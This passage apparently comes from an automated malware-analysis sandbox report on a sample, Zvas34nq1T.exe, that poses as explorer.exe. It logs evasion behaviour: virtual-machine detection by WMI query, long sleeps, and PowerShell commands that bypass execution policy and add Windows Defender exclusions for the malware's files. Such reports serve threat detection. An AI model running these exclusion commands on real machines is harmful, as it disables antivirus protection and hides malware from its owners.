            Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeMemory allocated: 1440000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeMemory allocated: 1B170000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\explorer.exeMemory allocated: BF0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\explorer.exeMemory allocated: 1A7C0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\explorer.exeMemory allocated: 7E0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\explorer.exeMemory allocated: 1A3A0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\explorer.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\explorer.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeWindow / User API: threadDelayed 9496Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5106Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4725Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6895Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2658Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3266Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6364Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7349Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2271Jump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe TID: 2668Thread sleep time: -33204139332677172s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512Thread sleep time: -9223372036854770s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7700Thread sleep count: 6895 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7704Thread sleep count: 2658 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7728Thread sleep time: -7378697629483816s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8076Thread sleep count: 3266 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8076Thread sleep count: 6364 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8104Thread sleep time: -6456360425798339s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3624Thread sleep count: 7349 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2800Thread sleep count: 2271 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2996Thread sleep time: -2767011611056431s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 7416Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 7436Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\explorer.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\AppData\Roaming\explorer.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\explorer.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\explorer.exeThread delayed: delay time: 922337203685477
            Source: Zvas34nq1T.exe, 00000000.00000002.2979655604.000000001C12F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW<w%SystemRoot%\system32\mswsock.dlltension type="System.ServiceModel.Channels.ContextBindingElementImporter, System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=MSIL"/>
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zvas34nq1T.exe'
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\explorer.exe'
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zvas34nq1T.exe'Jump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\explorer.exe'Jump to behavior
            Bypasses PowerShell execution policy
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zvas34nq1T.exe'
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zvas34nq1T.exe'Jump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Zvas34nq1T.exe'Jump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\explorer.exe'Jump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'Jump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeQueries volume information: C:\Users\user\Desktop\Zvas34nq1T.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
